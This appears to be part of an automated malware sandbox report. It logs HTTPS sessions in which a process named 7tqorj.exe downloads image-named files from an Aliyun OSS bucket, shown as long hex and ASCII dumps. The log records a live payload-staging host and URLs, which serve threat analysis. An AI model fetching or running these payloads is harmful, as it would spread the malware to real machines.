57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49994	118.178.60.9	443	3476	C:\Users\user\Documents\7tqorj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:51:20 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:51:20 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:51:20 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 677B5338EE85213732875D3C Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 5
2025-01-06 03:51:20 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2025-01-06 03:51:20 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49995	118.178.60.9	443	3476	C:\Users\user\Documents\7tqorj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:51:21 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:51:22 UTC	548	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:51:22 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 677B533A3D53853135278B2D Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 11
2025-01-06 03:51:22 UTC	3548	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-06 03:51:22 UTC	4096	IN	Data Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 Data Ascii: B;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2025-01-06 03:51:22 UTC	4096	IN	Data Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2025-01-06 03:51:22 UTC	4096	IN	Data Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c Data Ascii: E^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2025-01-06 03:51:22 UTC	4096	IN	Data Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2025-01-06 03:51:22 UTC	4096	IN	Data Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|
2025-01-06 03:51:22 UTC	4096	IN	Data Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
2025-01-06 03:51:22 UTC	4096	IN	Data Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca Data Ascii: ~07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
